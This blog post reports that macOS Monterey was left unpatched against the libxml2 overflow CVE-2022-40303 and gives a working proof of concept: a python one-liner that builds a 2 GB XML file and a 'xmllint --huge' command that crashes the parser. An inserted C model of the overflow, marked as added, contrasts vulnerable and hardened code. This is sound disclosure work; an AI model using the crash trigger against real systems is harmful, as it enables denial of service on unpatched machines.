Jeff Johnson (My apps, PayPal.Me)

macOS Monterey still vulnerable to CVE-2022-40303

December 1 2022

On November 9, Apple released macOS Ventura 13.0.1, as well as iOS 16.1.1 and iPadOS 16.1.1. The release notes list two security vulnerabilities fixed.


Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed through improved input validation.

CVE-2022-40303: Maddie Stone of Google Project Zero


Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero

Usually when Apple releases an update to the latest major version of macOS (currently Ventura), they also release security updates for the previous two major versions of macOS (Monterey and Big Sur). In this case, they did not patch the previous versions.

I've found a bug report written by Maddie Stone of Google Project Zero, who discovered the vulnerability. The bug report includes a proof of concept. I tried the proof of concept on the latest version of macOS Monterey, version 12.6.1 (21G217), and the proof of concept worked! Thus, Monterey (and likely Big Sur too) is still vulnerable to CVE-2022-40303. Two weeks later, Apple has failed to patch what is now a zero-day.

I made a couple of trivial modifications to the proof of concept to make it work on macOS. Warning: the PoC creates a 2.15 GB file, so make sure your disk has enough free space. The --huge flag matters: it turns on libxml2's XML_PARSE_HUGE option, which lifts the parser's default limits (including the maximum length of a name), so without it xmllint rejects the oversized attribute name as too long before the vulnerable arithmetic is ever reached. In Terminal, just enter these two commands (the second one takes a while, since xmllint has to read the whole file).

python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > /tmp/name_big.xml
/usr/bin/xmllint --huge /tmp/name_big.xml

You should see an error similar to the following, along with a crash report window. Send the crash report to Apple!

zsh: segmentation fault  /usr/bin/xmllint --huge /tmp/name_big.xml

Afterward you can delete the big file.

rm /tmp/name_big.xml
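The following is an added example, not libxml2 code and not part of the original post, that models the bug class Apple describes above (an integer overflow fixed by "improved input validation"). libxml2 counts the bytes of an XML name in a C int, which is why the PoC needs an attribute name of 0x80000000 bytes, one past INT_MAX. To make the wrap observable without a 2 GB file, this model counts in int16_t, so it wraps at 0x8000 bytes; the arithmetic is otherwise the same. The two demo limits (50 and 20000 bytes) are this model's own, scaled to the 16-bit counter; what is real is that libxml2's default name limit is 50000 bytes and that XML_PARSE_HUGE (xmllint --huge) lifts it. The hardened scanner shows the shape of the fix: a bound that is checked inside the loop and that still applies in huge mode, so the counter can never wrap.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Scaled-down model of the integer-overflow class behind CVE-2022-40303.
 * Added example; not libxml2 code. libxml2's counter is a 32-bit int and
 * needs the PoC's 0x80000000-byte name to wrap; this one is int16_t and
 * wraps at 0x8000 bytes.
 */
typedef int16_t name_len_t;

/* Demo limits, scaled to the 16-bit counter. (libxml2's real default name
 * limit is 50000 bytes; XML_PARSE_HUGE, which xmllint --huge enables,
 * lifts it.) The hard cap is deliberately below the counter's maximum
 * and applies even in huge mode. */
#define DEMO_NAME_MAX_DEFAULT 50
#define DEMO_NAME_MAX_HUGE    20000   /* < INT16_MAX */

static int is_name_char(unsigned char c) {
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '_' || c == '-' || c == '.' || c == ':';
}

/* Vulnerable pattern: the length is counted in a signed counter with no
 * upper bound. Past its maximum the counter goes negative, and a negative
 * length handed to the next stage (a dictionary lookup, a copy) is
 * reinterpreted as a huge unsigned size. Returns the length the scanner
 * believes it saw. */
name_len_t scan_name_unchecked(const char *buf, size_t buflen) {
    name_len_t len = 0;
    for (size_t i = 0; i < buflen && is_name_char((unsigned char)buf[i]); i++)
        len++;               /* int16_t: 32767 + 1 becomes -32768 */
    return len;
}

/* Hardened pattern: count in size_t, compare against an explicit cap inside
 * the loop (so a hostile 2 GB name is rejected at the cap, not after the
 * whole file is read), and keep a hard cap even when the caller asked for
 * huge mode. Returns the length, or -1 if the name is too long. */
long scan_name_checked(const char *buf, size_t buflen, int huge) {
    size_t max = huge ? DEMO_NAME_MAX_HUGE : DEMO_NAME_MAX_DEFAULT;
    size_t len = 0;
    for (size_t i = 0; i < buflen && is_name_char((unsigned char)buf[i]); i++) {
        if (len >= max)
            return -1;       /* name too long: fail closed before any wrap */
        len++;
    }
    return (long)len;
}

/* Constructed input: an n-byte name of 'a', the same shape as the PoC's
 * ATTLIST attribute name. Caller frees. */
char *make_name(size_t n) {
    char *p = malloc(n + 1);
    if (p == NULL) abort();
    memset(p, 'a', n);
    p[n] = '\0';
    return p;
}

/* What a wrapped counter turns into once it reaches code that takes a size. */
size_t as_copy_size(name_len_t len) {
    return (size_t)len;      /* -32768 becomes SIZE_MAX - 32767 */
}

int main(void) {
    size_t n = 0x8000;       /* one past the 16-bit counter's maximum */
    char *name = make_name(n);
    name_len_t bad = scan_name_unchecked(name, n);
    printf("unchecked: %zu-byte name counted as %d -> copy size %zu\n",
           n, (int)bad, as_copy_size(bad));
    printf("checked (huge=1), %zu bytes: %ld\n", n, scan_name_checked(name, n, 1));
    printf("checked (huge=0), 100 bytes: %ld\n", scan_name_checked(name, 100, 0));
    printf("checked (huge=1), 100 bytes: %ld\n", scan_name_checked(name, 100, 1));
    free(name);
    return 0;
}
```

The narrowing of 32768 into int16_t is implementation-defined rather than undefined behaviour, so the demo wraps deterministically on mainstream compilers; with a real int counter the same overflow is undefined behaviour, which is one more reason the fix has to stop the count before it gets there rather than detect the wrap afterwards.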

I also found a bug report for CVE-2022-40304, the second vulnerability fixed by macOS 13.0.1, but I wasn't able to reproduce that crash using the given test case. According to the bug report, "the test case may need to be run multiple times (by xmllint or any other parser using libxml2) to see the crash due to the system time being used to select the random seed", so perhaps I didn't run it enough times, or I was doing something else wrong. Since Monterey and Ventura both use the same open source library libxml2, and Monterey is still vulnerable to CVE-2022-40303, I suspect that it's still vulnerable to CVE-2022-40304 as well. I can't prove that myself, however, like I could with CVE-2022-40303.

Why don't all Mac users just update to Ventura? Well, some of them can't. Ventura dropped support for a number of Mac models: compare Ventura with Monterey system requirements. Another reason is that Ventura wrecked System Preferences. I find the new System Settings practically unusable. I hesitate to link to Twitter, because I've stopped using Twitter, but here's a link to a video demonstrating how unusable System Settings is from the keyboard. Besides System Preferences, Ventura also wrecked the system share menu. If Apple wants Mac users to always install the latest version for safety, then Apple should stop breaking the user interface!


You may not see a crash report window unless you've set Crash Reporter Preferences to Developer mode. This useful app comes with Apple's Additional Tools for Xcode download.

[Screenshot: Crash Reporter Preferences]

You can also set Developer mode in Terminal without the app. (You may need to log out afterward.)

defaults write com.apple.CrashReporter DialogType developer

Addendum December 13 2022

Apple finally patched both CVE-2022-40303 and CVE-2022-40304 today in macOS Monterey 12.6.2 and Big Sur 11.7.2. That left these bugs as 0days for more than a month. This is not responsible behavior by one of the largest corporations in the world.

By the way, I noticed this in About the security content of macOS Ventura 13.1 (but not in macOS Monterey 12.6.2):


Available for: macOS Ventura

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

I didn't know you could shake a Mac to undo?
